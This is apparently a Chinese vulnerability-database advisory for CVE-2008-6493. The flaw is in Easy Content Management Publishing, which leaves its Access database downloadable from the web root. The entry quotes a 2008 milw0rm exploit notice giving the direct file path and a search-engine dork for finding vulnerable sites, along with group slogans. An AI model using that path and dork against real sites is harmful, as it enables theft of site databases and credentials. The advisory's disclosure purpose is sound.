Easy-News Easy Content Management Publishing 'Database/News.mdb'权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116936 漏洞类型 权限许可和访问控制
发布时间 2008-12-04 更新时间 2009-03-19
CVE编号 CVE-2008-6493 CNNVD-ID CNNVD-200903-330
漏洞平台 ASP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/7340
https://www.securityfocus.com/bid/84558
https://cxsecurity.com/issue/WLB-2009030204
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-330
|漏洞详情
EasyContentManagementPublishing是一款基于ASP的简单易用的内容管理系统。EasyContentManagementPublishing在网根下储存敏感信息,但没有赋予足够的访问控制,这会允许远程攻击者可以借助对Database/News.mdb的一个直接请求,下载数据库。
|漏洞EXP
#######################################################
# Author : BeyazKurt
# Contact : BeyazKurt@BSDMail.Com
# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
#
# Script : Easy Content Management Publishing
# Script Site : http://easy-news.org/content-management-terns.asp
# Description :
#  An easy to use ASP-based content management news system. Mulitple login levels, news expiration dates and many more 
# features. Uses MS Access database. Content management systems help increase freshness of your sites content by makeing it 
# easy to update. Free license under the GPL.
# 
# Exploit:
# SITE.COM/Database/News.mdb
# D0rk : "powered by easy-news.org"
#
# -------------------------------
#       Mitrovica është Kosovë, Kosova është Shqiperi - Etnic ALBANIA (H)
#                       Proud 2 Be MUSLIM !
#                      Proud 2 Be ALBANIAN !
# Boyle aciklarida yayinliyosan yuh a.g
#######################################################

# milw0rm.com [2008-12-04]
|受影响的产品
Easy-News Easy Content Management Publishing -
|参考资料

来源:XF
名称:easycontent-news-information-disclosure(49392)
链接:http://xforce.iss.net/xforce/xfdb/49392
来源:MILW0RM
名称:7340
链接:http://www.milw0rm.com/exploits/7340